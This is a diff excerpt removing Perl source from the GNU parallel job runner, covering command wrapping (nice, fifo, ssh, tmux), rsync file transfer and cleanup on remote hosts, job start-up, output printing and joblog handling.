-    # * --tmux
-    # The ordering of the wrapping is important:
-    # * --nice/--cat/--fifo should be done on the remote machine
-    # * --pipepart/--pipe should be done on the local machine inside --tmux
-    # Uses:
-    #   $Global::envvar
-    #   $opt::shellquote
-    #   $opt::nice
-    #   $Global::shell
-    #   $opt::cat
-    #   $opt::fifo
-    #   @Global::cat_partials
-    #   $opt::pipe
-    #   $opt::tmux
-    # Returns:
-    #   $self->{'wrapped'} = the command wrapped with the above
-    my $self = shift;
-    if(not defined $self->{'wrapped'}) {
-	my $command = $Global::envvar.$self->replaced();
-	if($opt::shellquote) {
-	    # Prepend echo
-	    # and quote twice
-	    $command = "echo " .
-		::shell_quote_scalar(::shell_quote_scalar($command));
-	}
-	if($opt::nice) {
-	    # Prepend \nice -n19 $SHELL -c
-	    # and quote.
-	    # The '\' before nice is needed to avoid tcsh's built-in
-	    $command = '\nice'. " -n". $opt::nice. " ".
-		$Global::shell. " -c ".
-		::shell_quote_scalar($command);
-	}
-	if($opt::cat) {
-	    # Prepend 'cat > {};'
-	    # Append '_EXIT=$?;(rm {};exit $_EXIT)'
-	    $command =
-		$self->{'commandline'}->replace_placeholders(["cat > \257<\257>; "], 0, 0).
-		$command.
-		$self->{'commandline'}->replace_placeholders(
-		    ["; _EXIT=\$?; rm \257<\257>; exit \$_EXIT"], 0, 0);
-	} elsif($opt::fifo) {
-	    # Prepend 'mkfifo {}; ('
-	    # Append ') & _PID=$!; cat > {}; wait $_PID; _EXIT=$?;(rm {};exit $_EXIT)'
-	    $command =
-		$self->{'commandline'}->replace_placeholders(["mkfifo \257<\257>; ("], 0, 0).
-		$command.
-		$self->{'commandline'}->replace_placeholders([") & _PID=\$!; cat > \257<\257>; ",
-					    "wait \$_PID; _EXIT=\$?; ",
-					    "rm \257<\257>; exit \$_EXIT"],
-					    0,0);
-	}
-	# Wrap with ssh + tranferring of files
-	$command = $self->sshlogin_wrap($command);
-	if(@Global::cat_partials) {
-	    # Prepend:
-	    # < /tmp/foo perl -e 'while(@ARGV) { sysseek(STDIN,shift,0) || die; $left = shift; while($read = sysread(STDIN,$buf, ($left > 32768 ? 32768 : $left))){ $left -= $read; syswrite(STDOUT,$buf); } }'  0 0 0 11 |
-	    $command = (shift @Global::cat_partials). "|". "(". $command. ")";
-	} elsif($opt::pipe) {
-	    # Prepend EOF-detector to avoid starting $command if EOF.
-	    # The $tmpfile might exist if run on a remote system - we accept that risk
-	    my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".chr");
-	    # Unlink to avoid leaving files if --dry-run or --sshlogin
-	    unlink $tmpfile;
-	    $command =
-		# Exit value:
-		#   empty input = true
-		#   some input = exit val from command
-		qq{ sh -c 'dd bs=1 count=1 of=$tmpfile 2>/dev/null'; }.
-		qq{ test \! -s "$tmpfile" && rm -f "$tmpfile" && exec true; }.
-		qq{ (cat $tmpfile; rm $tmpfile; cat - ) | }.
-		"($command);";
-	}
-	if($opt::tmux) {
-	    # Wrap command with 'tmux'
-	    $command = $self->tmux_wrap($command);
-	}
-	$self->{'wrapped'} = $command;
-    }
-    return $self->{'wrapped'};
-}
-
-sub set_sshlogin {
-    my $self = shift;
-    my $sshlogin = shift;
-    $self->{'sshlogin'} = $sshlogin;
-    delete $self->{'sshlogin_wrap'}; # If sshlogin is changed the wrap is wrong
-    delete $self->{'wrapped'};
-}
-
-sub sshlogin {
-    my $self = shift;
-    return $self->{'sshlogin'};
-}
-
-sub sshlogin_wrap {
-    # Wrap the command with the commands needed to run remotely
-    # Returns:
-    #   $self->{'sshlogin_wrap'} = command wrapped with ssh+transfer commands
-    my $self = shift;
-    my $command = shift;
-    if(not defined $self->{'sshlogin_wrap'}) {
-	my $sshlogin = $self->sshlogin();
-	my $sshcmd = $sshlogin->sshcommand();
-	my $serverlogin = $sshlogin->serverlogin();
-	my ($pre,$post,$cleanup)=("","","");
-
-	if($serverlogin eq ":") {
-	    # No transfer neeeded
-	    $self->{'sshlogin_wrap'} = $command;
-	} else {
-	    # --transfer
-	    $pre .= $self->sshtransfer();
-	    # --return
-	    $post .= $self->sshreturn();
-	    # --cleanup
-	    $post .= $self->sshcleanup();
-	    if($post) {
-		# We need to save the exit status of the job
-		$post = '_EXIT_status=$?; ' . $post . ' exit $_EXIT_status;';
-	    }
-	    # If the remote login shell is (t)csh then use 'setenv'
-	    # otherwise use 'export'
-	    # We cannot use parse_env_var(), as PARALLEL_SEQ changes
-	    # for each command
-	    my $parallel_env =
-		($Global::envwarn
-		 . q{ 'eval `echo $SHELL | grep "/t\\{0,1\\}csh" > /dev/null }
-		 . q{ && echo setenv PARALLEL_SEQ '$PARALLEL_SEQ'\; }
-		 . q{ setenv PARALLEL_PID '$PARALLEL_PID' }
-		 . q{ || echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\; }
-		 . q{ PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;' });
-	    my $remote_pre = "";
-	    my $ssh_options = "";
-	    if(($opt::pipe or $opt::pipepart) and $opt::ctrlc
-	       or
-	       not ($opt::pipe or $opt::pipepart) and not $opt::noctrlc) {
-		# TODO Determine if this is needed
-		# Propagating CTRL-C to kill remote jobs requires
-		# remote jobs to be run with a terminal.
-		$ssh_options = "-tt -oLogLevel=quiet";
-#		$ssh_options = "";
-		# tty - check if we have a tty.
-		# stty:
-		#   -onlcr - make output 8-bit clean
-		#   isig - pass CTRL-C as signal
-		#   -echo - do not echo input
-		$remote_pre .= ::shell_quote_scalar('tty >/dev/null && stty isig -onlcr -echo;');
-	    }
-	    if($opt::workdir) {
-		my $wd = ::shell_quote_file($self->workdir());
-		$remote_pre .= ::shell_quote_scalar("mkdir -p ") . $wd .
-		    ::shell_quote_scalar("; cd ") . $wd .
-		    # exit 255 (instead of exec false) would be the correct thing,
-		    # but that fails on tcsh
-		    ::shell_quote_scalar(qq{ || exec false;});
-	    }
-	    # This script is to solve the problem of
-	    # * not mixing STDERR and STDOUT
-	    # * terminating with ctrl-c
-	    # It works on Linux but not Solaris
-	    # Finishes on Solaris, but wrong exit code:
-	    # $SIG{CHLD} = sub {exit ($?&127 ? 128+($?&127) : 1+$?>>8)};
-	    # Hangs on Solaris, but correct exit code on Linux:
-	    # $SIG{CHLD} = sub { $done = 1 };
-	    # $p->poll;
-	    my $signal_script = "perl -e '".
-	    q{
-		use IO::Poll;
-                $SIG{CHLD} = sub { $done = 1 };
-		$p = IO::Poll->new;
-		$p->mask(STDOUT, POLLHUP);
-		$pid=fork; unless($pid) {setpgrp; exec $ENV{SHELL}, "-c", @ARGV; die "exec: $!\n"}
-                $p->poll;
-		kill SIGHUP, -${pid} unless $done;
-		wait; exit ($?&127 ? 128+($?&127) : 1+$?>>8)
-            } . "' ";
-	    $signal_script =~ s/\s+/ /g;
-
-	    $self->{'sshlogin_wrap'} =
-		($pre
-		 . "$sshcmd $ssh_options $serverlogin $parallel_env "
-		 . $remote_pre
-#		 . ::shell_quote_scalar($signal_script . ::shell_quote_scalar($command))
-		 . ::shell_quote_scalar($command)
-		 . ";"
-		 . $post);
-	}
-    }
-    return $self->{'sshlogin_wrap'};
-}
-
-sub transfer {
-    # Files to transfer
-    # Returns:
-    #   @transfer - File names of files to transfer
-    my $self = shift;
-    my @transfer = ();
-    $self->{'transfersize'} = 0;
-    if($opt::transfer) {
-	for my $record (@{$self->{'commandline'}{'arg_list'}}) {
-	    # Merge arguments from records into args
-	    for my $arg (@$record) {
-		CORE::push @transfer, $arg->orig();
-		# filesize
-		if(-e $arg->orig()) {
-		    $self->{'transfersize'} += (stat($arg->orig()))[7];
-		}
-	    }
-	}
-    }
-    return @transfer;
-}
-
-sub transfersize {
-    my $self = shift;
-    return $self->{'transfersize'};
-}
-
-sub sshtransfer {
-    # Returns for each transfer file:
-    #   rsync $file remote:$workdir
-    my $self = shift;
-    my @pre;
-    my $sshlogin = $self->sshlogin();
-    my $workdir = $self->workdir();
-    for my $file ($self->transfer()) {
-      push @pre, $sshlogin->rsync_transfer_cmd($file,$workdir).";";
-    }
-    return join("",@pre);
-}
-
-sub return {
-    # Files to return
-    # Non-quoted and with {...} substituted
-    # Returns:
-    #   @non_quoted_filenames
-    my $self = shift;
-    return $self->{'commandline'}->
-	replace_placeholders($self->{'commandline'}{'return_files'},0,0);
-}
-
-sub returnsize {
-    # This is called after the job has finished
-    # Returns:
-    #   $number_of_bytes transferred in return
-    my $self = shift;
-    for my $file ($self->return()) {
-	if(-e $file) {
-	    $self->{'returnsize'} += (stat($file))[7];
-	}
-    }
-    return $self->{'returnsize'};
-}
-
-sub sshreturn {
-    # Returns for each return-file:
-    #   rsync remote:$workdir/$file .
-    my $self = shift;
-    my $sshlogin = $self->sshlogin();
-    my $sshcmd = $sshlogin->sshcommand();
-    my $serverlogin = $sshlogin->serverlogin();
-    my $rsync_opt = "-rlDzR -e".::shell_quote_scalar($sshcmd);
-    my $pre = "";
-    for my $file ($self->return()) {
-	$file =~ s:^\./::g; # Remove ./ if any
-	my $relpath = ($file !~ m:^/:); # Is the path relative?
-	my $cd = "";
-	my $wd = "";
-	if($relpath) {
-	    #   rsync -avR /foo/./bar/baz.c remote:/tmp/
-	    # == (on old systems)
-	    #   rsync -avR --rsync-path="cd /foo; rsync" remote:bar/baz.c /tmp/
-	    $wd = ::shell_quote_file($self->workdir()."/");
-	}
-	# Only load File::Basename if actually needed
-	$Global::use{"File::Basename"} ||= eval "use File::Basename; 1;";
-	# dir/./file means relative to dir, so remove dir on remote
-	$file =~ m:(.*)/\./:;
-	my $basedir = $1 ? ::shell_quote_file($1."/") : "";
-	my $nobasedir = $file;
-	$nobasedir =~ s:.*/\./::;
-	$cd = ::shell_quote_file(::dirname($nobasedir));
-	my $rsync_cd = '--rsync-path='.::shell_quote_scalar("cd $wd$cd; rsync");
-	my $basename = ::shell_quote_scalar(::shell_quote_file(basename($file)));
-	# --return
-	#   mkdir -p /home/tange/dir/subdir/;
-        #   rsync (--protocol 30) -rlDzR --rsync-path="cd /home/tange/dir/subdir/; rsync"
-        #   server:file.gz /home/tange/dir/subdir/
-	$pre .= "mkdir -p $basedir$cd; ".$sshlogin->rsync()." $rsync_cd $rsync_opt $serverlogin:".
-	     $basename . " ".$basedir.$cd.";";
-    }
-    return $pre;
-}
-
-sub sshcleanup {
-    # Return the sshcommand needed to remove the file
-    # Returns:
-    #   ssh command needed to remove files from sshlogin
-    my $self = shift;
-    my $sshlogin = $self->sshlogin();
-    my $sshcmd = $sshlogin->sshcommand();
-    my $serverlogin = $sshlogin->serverlogin();
-    my $workdir = $self->workdir();
-    my $cleancmd = "";
-
-    for my $file ($self->cleanup()) {
-	my @subworkdirs = parentdirs_of($file);
-	$cleancmd .= $sshlogin->cleanup_cmd($file,$workdir).";";
-    }
-    if(defined $opt::workdir and $opt::workdir eq "...") {
-	$cleancmd .= "$sshcmd $serverlogin rm -rf " . ::shell_quote_scalar($workdir).';';
-    }
-    return $cleancmd;
-}
-
-sub cleanup {
-    # Returns:
-    #   Files to remove at cleanup
-    my $self = shift;
-    if($opt::cleanup) {
-	my @transfer = $self->transfer();
-	my @return = $self->return();
-	return (@transfer,@return);
-    } else {
-	return ();
-    }
-}
-
-sub workdir {
-    # Returns:
-    #   the workdir on a remote machine
-    my $self = shift;
-    if(not defined $self->{'workdir'}) {
-	my $workdir;
-	if(defined $opt::workdir) {
-	    if($opt::workdir eq ".") {
-		# . means current dir
-		my $home = $ENV{'HOME'};
-		eval 'use Cwd';
-		my $cwd = cwd();
-		$workdir = $cwd;
-		if($home) {
-		    # If homedir exists: remove the homedir from
-		    # workdir if cwd starts with homedir
-		    # E.g. /home/foo/my/dir => my/dir
-		    # E.g. /tmp/my/dir => /tmp/my/dir
-		    my ($home_dev, $home_ino) = (stat($home))[0,1];
-		    my $parent = "";
-		    my @dir_parts = split(m:/:,$cwd);
-		    my $part;
-		    while(defined ($part = shift @dir_parts)) {
-			$part eq "" and next;
-			$parent .= "/".$part;
-			my ($parent_dev, $parent_ino) = (stat($parent))[0,1];
-			if($parent_dev == $home_dev and $parent_ino == $home_ino) {
-			    # dev and ino is the same: We found the homedir.
-			    $workdir = join("/",@dir_parts);
-			    last;
-			}
-		    }
-		}
-		if($workdir eq "") {
-		    $workdir = ".";
-		}
-	    } elsif($opt::workdir eq "...") {
-		$workdir = ".parallel/tmp/" . ::hostname() . "-" . $$
-		    . "-" . $self->seq();
-	    } else {
-		$workdir = $opt::workdir;
-		# Rsync treats /./ special. We dont want that
-		$workdir =~ s:/\./:/:g; # Remove /./
-		$workdir =~ s:/+$::; # Remove ending / if any
-		$workdir =~ s:^\./::g; # Remove starting ./ if any
-	    }
-	} else {
-	    $workdir = ".";
-	}
-	$self->{'workdir'} = ::shell_quote_scalar($workdir);
-    }
-    return $self->{'workdir'};
-}
-
-sub parentdirs_of {
-    # Return:
-    #   all parentdirs except . of this dir or file - sorted desc by length
-    my $d = shift;
-    my @parents = ();
-    while($d =~ s:/[^/]+$::) {
-	if($d ne ".") {
-	    push @parents, $d;
-	}
-    }
-    return @parents;
-}
-
-sub start {
-    # Setup STDOUT and STDERR for a job and start it.
-    # Returns:
-    #   job-object or undef if job not to run
-    my $job = shift;
-    # Get the shell command to be executed (possibly with ssh infront).
-    my $command = $job->wrapped();
-
-    if($Global::interactive or $Global::stderr_verbose) {
-	if($Global::interactive) {
-	    print $Global::original_stderr "$command ?...";
-	    open(my $tty_fh, "<", "/dev/tty") || ::die_bug("interactive-tty");
-	    my $answer = <$tty_fh>;
-	    close $tty_fh;
-	    my $run_yes = ($answer =~ /^\s*y/i);
-	    if (not $run_yes) {
-		$command = "true"; # Run the command 'true'
-	    }
-	} else {
-	    print $Global::original_stderr "$command\n";
-	}
-    }
-
-    my $pid;
-    $job->openoutputfiles();
-    my($stdout_fh,$stderr_fh) = ($job->fh(1,"w"),$job->fh(2,"w"));
-    local (*IN,*OUT,*ERR);
-    open OUT, '>&', $stdout_fh or ::die_bug("Can't redirect STDOUT: $!");
-    open ERR, '>&', $stderr_fh or ::die_bug("Can't dup STDOUT: $!");
-
-    if(($opt::dryrun or $Global::verbose) and $opt::ungroup) {
-	if($Global::verbose <= 1) {
-	    print $stdout_fh $job->replaced(),"\n";
-	} else {
-	    # Verbose level > 1: Print the rsync and stuff
-	    print $stdout_fh $command,"\n";
-	}
-    }
-    if($opt::dryrun) {
-	$command = "true";
-    }
-    $ENV{'PARALLEL_SEQ'} = $job->seq();
-    $ENV{'PARALLEL_PID'} = $$;
-    ::debug("run", $Global::total_running, " processes . Starting (",
-	    $job->seq(), "): $command\n");
-    if($opt::pipe) {
-	my ($stdin_fh);
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3($stdin_fh, ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-pipe");
-	    1;
-	};
-	$job->set_fh(0,"w",$stdin_fh);
-    } elsif(@opt::a and not $Global::stdin_in_opt_a and $job->seq() == 1
-	    and $job->sshlogin()->string() eq ":") {
-	# Give STDIN to the first job if using -a (but only if running
-	# locally - otherwise CTRL-C does not work for other jobs Bug#36585)
-	*IN = *STDIN;
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3("<&IN", ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-a");
-	    1;
-	};
-	# Re-open to avoid complaining
-	open(STDIN, "<&", $Global::original_stdin)
-	    or ::die_bug("dup-\$Global::original_stdin: $!");
-    } elsif ($opt::tty and not $Global::tty_taken and -c "/dev/tty" and
-	     open(my $devtty_fh, "<", "/dev/tty")) {
-	# Give /dev/tty to the command if no one else is using it
-	*IN = $devtty_fh;
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3("<&IN", ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-/dev/tty");
-	    $Global::tty_taken = $pid;
-	    close $devtty_fh;
-	    1;
-	};
-    } else {
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3(::gensym, ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-gensym");
-	    1;
-	};
-    }
-    if($pid) {
-	# A job was started
-	$Global::total_running++;
-	$Global::total_started++;
-	$job->set_pid($pid);
-	$job->set_starttime();
-	$Global::running{$job->pid()} = $job;
-	if($opt::timeout) {
-	    $Global::timeoutq->insert($job);
-	}
-	$Global::newest_job = $job;
-	$Global::newest_starttime = ::now();
-	return $job;
-    } else {
-	# No more processes
-	::debug("run", "Cannot spawn more jobs.\n");
-	return undef;
-    }
-}
-
-sub tmux_wrap {
-    # Wrap command with tmux for session pPID
-    # Input:
-    #   $actual_command = the actual command being run (incl ssh wrap)
-    my $self = shift;
-    my $actual_command = shift;
-    # Temporary file name. Used for fifo to communicate exit val
-    my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".tmx");
-    $Global::unlink{$tmpfile}=1;
-    close $fh;
-    unlink $tmpfile;
-    my $visual_command = $self->replaced();
-    my $title = $visual_command;
-    # ; causes problems
-    # ascii 194-245 annoys tmux
-    $title =~ tr/[\011-\016;\302-\365]//d;
-
-    my $tmux;
-    if($Global::total_running == 0) {
-	$tmux = "tmux new-session -s p$$ -d -n ".
-	    ::shell_quote_scalar($title);
-	print $Global::original_stderr "See output with: tmux attach -t p$$\n";
-    } else {
-	$tmux = "tmux new-window -t p$$ -n ".::shell_quote_scalar($title);
-    }
-    return "mkfifo $tmpfile; $tmux ".
-	# Run in tmux
-	::shell_quote_scalar(
-	"(".$actual_command.');(echo $?$status;echo 255) >'.$tmpfile."&".
-	"echo ".::shell_quote_scalar($visual_command).";".
-	"echo \007Job finished at: `date`;sleep 10").
-	# Run outside tmux
-	# Read the first line from the fifo and use that as status code
-	";  exit `perl -ne 'unlink \$ARGV; 1..1 and print' $tmpfile` ";
-}
-
-sub is_already_in_results {
-    # Do we already have results for this job?
-    # Returns:
-    #   $job_already_run = bool whether there is output for this or not
-    my $job = $_[0];
-    my $args_as_dirname = $job->{'commandline'}->args_as_dirname();
-    # prefix/name1/val1/name2/val2/
-    my $dir = $opt::results."/".$args_as_dirname;
-    ::debug("run", "Test $dir/stdout", -e "$dir/stdout", "\n");
-    return -e "$dir/stdout";
-}
-
-sub is_already_in_joblog {
-    my $job = shift;
-    return vec($Global::job_already_run,$job->seq(),1);
-}
-
-sub set_job_in_joblog {
-    my $job = shift;
-    vec($Global::job_already_run,$job->seq(),1) = 1;
-}
-
-sub should_be_retried {
-    # Should this job be retried?
-    # Returns
-    #   0 - do not retry
-    #   1 - job queued for retry
-    my $self = shift;
-    if (not $opt::retries) {
-	return 0;
-    }
-    if(not $self->exitstatus()) {
-	# Completed with success. If there is a recorded failure: forget it
-	$self->reset_failed_here();
-	return 0
-    } else {
-	# The job failed. Should it be retried?
-	$self->add_failed_here();
-	if($self->total_failed() == $opt::retries) {
-	    # This has been retried enough
-	    return 0;
-	} else {
-	    # This command should be retried
-	    $self->set_endtime(undef);
-	    $Global::JobQueue->unget($self);
-	    ::debug("run", "Retry ", $self->seq(), "\n");
-	    return 1;
-	}
-    }
-}
-
-sub print {
-    # Print the output of the jobs
-    # Returns: N/A
-
-    my $self = shift;
-    ::debug("print", ">>joboutput ", $self->replaced(), "\n");
-    if($opt::dryrun) {
-	# Nothing was printed to this job:
-	# cleanup tmp files if --files was set
-	unlink $self->fh(1,"name");
-    }
-    if($opt::pipe and $self->virgin()) {
-	# Skip --joblog, --dryrun, --verbose
-    } else {
-	if($Global::joblog and defined $self->{'exitstatus'}) {
-	    # Add to joblog when finished
-	    $self->print_joblog();
-	}
-
-	# Printing is only relevant for grouped/--line-buffer output.
-	$opt::ungroup and return;
-	# Check for disk full
-	exit_if_disk_full();
-
-	if(($opt::dryrun or $Global::verbose)
-	   and
-	   not $self->{'verbose_printed'}) {
-	    $self->{'verbose_printed'}++;
-	    if($Global::verbose <= 1) {
-		print STDOUT $self->replaced(),"\n";
-	    } else {
-		# Verbose level > 1: Print the rsync and stuff
-		print STDOUT $self->wrapped(),"\n";
-	    }
-	    # If STDOUT and STDERR are merged,
-	    # we want the command to be printed first
-	    # so flush to avoid STDOUT being buffered
-	    flush STDOUT;
-	}
-    }
-    for my $fdno (sort { $a <=> $b } keys %Global::fd) {
-	# Sort by file descriptor numerically: 1,2,3,..,9,10,11
-	$fdno == 0 and next;
-	my $out_fd = $Global::fd{$fdno};
-	my $in_fh = $self->fh($fdno,"r");
-	if(not $in_fh) {
-	    if(not $Job::file_descriptor_warning_printed{$fdno}++) {
-		# ::warning("File descriptor $fdno not defined\n");
-	    }
-	    next;
-	}
-	::debug("print", "File descriptor $fdno (", $self->fh($fdno,"name"), "):");
-	if($opt::files) {
-	    # If --compress: $in_fh must be closed first.
-	    close $self->fh($fdno,"w");
-	    close $in_fh;
-	    if($opt::pipe and $self->virgin()) {
-		# Nothing was printed to this job:
-		# cleanup unused tmp files if --files was set
-		for my $fdno (1,2) {
-		    unlink $self->fh($fdno,"name");
-		    unlink $self->fh($fdno,"unlink");
-		}
-	    } elsif($fdno == 1 and $self->fh($fdno,"name")) {
-		print $out_fd $self->fh($fdno,"name"),"\n";
-	    }
-	} elsif($opt::linebuffer) {
-	    # Line buffered print out
-	    $self->linebuffer_print($fdno,$in_fh,$out_fd);
-	} else {
-	    my $buf;
-	    close $self->fh($fdno,"w");
-	    seek $in_fh, 0, 0;
-	    # $in_fh is now ready for reading at position 0
-	    if($opt::tag or defined $opt::tagstring) {
-		my $tag = $self->tag();
-		if($fdno == 2) {
-		    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		    # This is a crappy way of ignoring it.
-		    while(<$in_fh>) {
-			if(/^(client_process_control: )?tcgetattr: Invalid argument\n/) {
-			    # Skip
-			} else {
-			    print $out_fd $tag,$_;
-			}
-			# At most run the loop once
-			last;
-		    }
-		}
-		while(<$in_fh>) {
-		    print $out_fd $tag,$_;
-		}
-	    } else {
-		my $buf;
-		if($fdno == 2) {
-		    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		    # This is a crappy way of ignoring it.
-		    sysread($in_fh,$buf,1_000);
-		    $buf =~ s/^(client_process_control: )?tcgetattr: Invalid argument\n//;
-		    print $out_fd $buf;
-		}
-		while(sysread($in_fh,$buf,32768)) {
-		    print $out_fd $buf;
-		}
-	    }
-	    close $in_fh;
-	}
-	flush $out_fd;
-    }
-    ::debug("print", "<<joboutput @command\n");
-}
-
-sub linebuffer_print {
-    my $self = shift;
-    my ($fdno,$in_fh,$out_fd) = @_;
-    my $partial = \$self->{'partial_line',$fdno};
-
-    if(defined $self->{'exitstatus'}) {
-	# If the job is dead: close printing fh. Needed for --compress
-	close $self->fh($fdno,"w");
-	if($opt::compress) {
-	    # Blocked reading in final round
-	    $Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-	    for my $fdno (1,2) {
-		my $fdr = $self->fh($fdno,'r');
-		my $flags;
-		fcntl($fdr, &F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-		$flags &= ~&O_NONBLOCK; # Remove non-blocking to the flags
-		fcntl($fdr, &F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-	    }
-	}
-    }
-    # This seek will clear EOF
-    seek $in_fh, tell($in_fh), 0;
-    # The read is non-blocking: The $in_fh is set to non-blocking.
-    # 32768 --tag = 5.1s
-    # 327680 --tag = 4.4s
-    # 1024000 --tag = 4.4s
-    # 3276800 --tag = 4.3s
-    # 32768000 --tag = 4.7s
-    # 10240000 --tag = 4.3s
-    while(read($in_fh,substr($$partial,length $$partial),3276800)) {
-	# Append to $$partial
-	# Find the last \n
-	my $i = rindex($$partial,"\n");
-	if($i != -1) {
-	    # One or more complete lines were found
-	    if($fdno == 2 and not $self->{'printed_first_line',$fdno}++) {
-		# OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		# This is a crappy way of ignoring it.
-		$$partial =~ s/^(client_process_control: )?tcgetattr: Invalid argument\n//;
-		# Length of partial line has changed: Find the last \n again
-		$i = rindex($$partial,"\n");
-	    }
-	    if($opt::tag or defined $opt::tagstring) {
-		# Replace ^ with $tag within the full line
-		my $tag = $self->tag();
-		substr($$partial,0,$i+1) =~ s/^/$tag/gm;
-		# Length of partial line has changed: Find the last \n again
-		$i = rindex($$partial,"\n");
-	    }
-	    # Print up to and including the last \n
-	    print $out_fd substr($$partial,0,$i+1);
-	    # Remove the printed part
-	    substr($$partial,0,$i+1)="";
-	}
-    }
-    if(defined $self->{'exitstatus'}) {
-	# If the job is dead: print the remaining partial line
-	# read remaining
-	if($$partial and ($opt::tag or defined $opt::tagstring)) {
-	    my $tag = $self->tag();
-	    $$partial =~ s/^/$tag/gm;
-	}
-	print $out_fd $$partial;
-	# Release the memory
-	$$partial = undef;
-	if($self->fh($fdno,"rpid") and CORE::kill 0, $self->fh($fdno,"rpid")) {
-	    # decompress still running
-	} else {
-	    # decompress done: close fh
-	    close $in_fh;
-	}
-    }
-}
-
-sub print_joblog {
-    my $self = shift;
-    my $cmd;
-    if($Global::verbose <= 1) {
-	$cmd = $self->replaced();
-    } else {
-	# Verbose level > 1: Print the rsync and stuff
-	$cmd = "@command";
-    }
-    print $Global::joblog
-	join("\t", $self->seq(), $self->sshlogin()->string(),
-	     $self->starttime(), sprintf("%10.3f",$self->runtime()),
-	     $self->transfersize(), $self->returnsize(),
-	     $self->exitstatus(), $self->exitsignal(), $cmd
-	). "\n";
-    flush $Global::joblog;
-    $self->set_job_in_joblog();
-}
-
-sub tag {
-    my $self = shift;
-    if(not defined $self->{'tag'}) {
-	$self->{'tag'} = $self->{'commandline'}->
-	    replace_placeholders([$opt::tagstring],0,0)."\t";
-    }
-    return $self->{'tag'};
-}
-
-sub hostgroups {
-    my $self = shift;
-    if(not defined $self->{'hostgroups'}) {
-	$self->{'hostgroups'} = $self->{'commandline'}->{'arg_list'}[0][0]->{'hostgroups'};
-    }
-    return @{$self->{'hostgroups'}};
-}
-
-sub exitstatus {
-    my $self = shift;
-    return $self->{'exitstatus'};
-}
-
-sub set_exitstatus {
-    my $self = shift;
-    my $exitstatus = shift;
-    if($exitstatus) {
-	# Overwrite status if non-zero
-	$self->{'exitstatus'} = $exitstatus;
-    } else {
-	# Set status but do not overwrite
-	# Status may have been set by --timeout
-	$self->{'exitstatus'} ||= $exitstatus;
-    }
-}
-
-sub exitsignal {
-    my $self = shift;
-    return $self->{'exitsignal'};
-}
-
-sub set_exitsignal {
-    my $self = shift;
-    my $exitsignal = shift;
-    $self->{'exitsignal'} = $exitsignal;
-}
-
-{
-    my ($disk_full_fh, $b8193, $name);
-    sub exit_if_disk_full {
-	# Checks if $TMPDIR is full by writing 8kb to a tmpfile
-	# If the disk is full: Exit immediately.
-	# Returns:
-	#   N/A
-	if(not $disk_full_fh) {
-	    ($disk_full_fh, $name) = ::tmpfile(SUFFIX => ".df");
-	    unlink $name;
-	    $b8193 = "x"x8193;
-	}
-	# Linux does not discover if a disk is full if writing <= 8192
-	# Tested on:
-	# bfs btrfs cramfs ext2 ext3 ext4 ext4dev jffs2 jfs minix msdos
-	# ntfs reiserfs tmpfs ubifs vfat xfs
-	# TODO this should be tested on different OS similar to this:
-	#
-	# doit() {
-	#   sudo mount /dev/ram0 /mnt/loop; sudo chmod 1777 /mnt/loop
-	#   seq 100000 | parallel --tmpdir /mnt/loop/ true &
-	#   seq 6900000 > /mnt/loop/i && echo seq OK
-	#   seq 6980868 > /mnt/loop/i
-	#   seq 10000 > /mnt/loop/ii
-	#   sleep 3
-	#   sudo umount /mnt/loop/ || sudo umount -l /mnt/loop/
-	#   echo >&2
-	# }
-	print $disk_full_fh $b8193;
-	if(not $disk_full_fh
-	   or
-	   tell $disk_full_fh == 0) {
-	    ::error("Output is incomplete. Cannot append to buffer file in $ENV{'TMPDIR'}. Is the disk full?\n");
-	    ::error("Change \$TMPDIR with --tmpdir or use --compress.\n");
-	    ::wait_and_exit(255);
-	}
-	truncate $disk_full_fh, 0;
-	seek($disk_full_fh, 0, 0) || die;
-    }
-}
-
-
-package CommandLine;
-
-sub new {
-    my $class = shift;
-    my $seq = shift;
-    my $commandref = shift;
-    $commandref || die;
-    my $arg_queue = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift; # for -N and normal (-n1)
-    my $return_files = shift;
-    my $replacecount_ref = shift;
-    my $len_ref = shift;
-    my %replacecount = %$replacecount_ref;
-    my %len = %$len_ref;
-    for (keys %$replacecount_ref) {
-	# Total length of this replacement string {} replaced with all args
-	$len{$_} = 0;
-    }
-    return bless {
-	'command' => $commandref,
-	'seq' => $seq,
-	'len' => \%len,
-	'arg_list' => [],
-	'arg_queue' => $arg_queue,
-	'max_number_of_args' => $max_number_of_args,
-	'replacecount' => \%replacecount,
-	'context_replace' => $context_replace,
-	'return_files' => $return_files,
-	'replaced' => undef,
-    }, ref($class) || $class;
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'seq'};
-}
-
-{
-    my $max_slot_number;
-
-    sub slot {
-	# Find the number of a free job slot and return it
-	# Uses:
-	#   @Global::slots
-	# Returns:
-	#   $jobslot = number of jobslot
-	my $self = shift;
-	if(not $self->{'slot'}) {
-	    if(not @Global::slots) {
-		# $Global::max_slot_number will typically be $Global::max_jobs_running
-		push @Global::slots, ++$max_slot_number;
-	    }
-	    $self->{'slot'} = shift @Global::slots;
-	}
-	return $self->{'slot'};
-    }
-}
-
-sub populate {
-    # Add arguments from arg_queue until the number of arguments or
-    # max line length is reached
-    # Uses:
-    #   $Global::minimal_command_line_length
-    #   $opt::cat
-    #   $opt::fifo
-    #   $Global::JobQueue
-    #   $opt::m
-    #   $opt::X
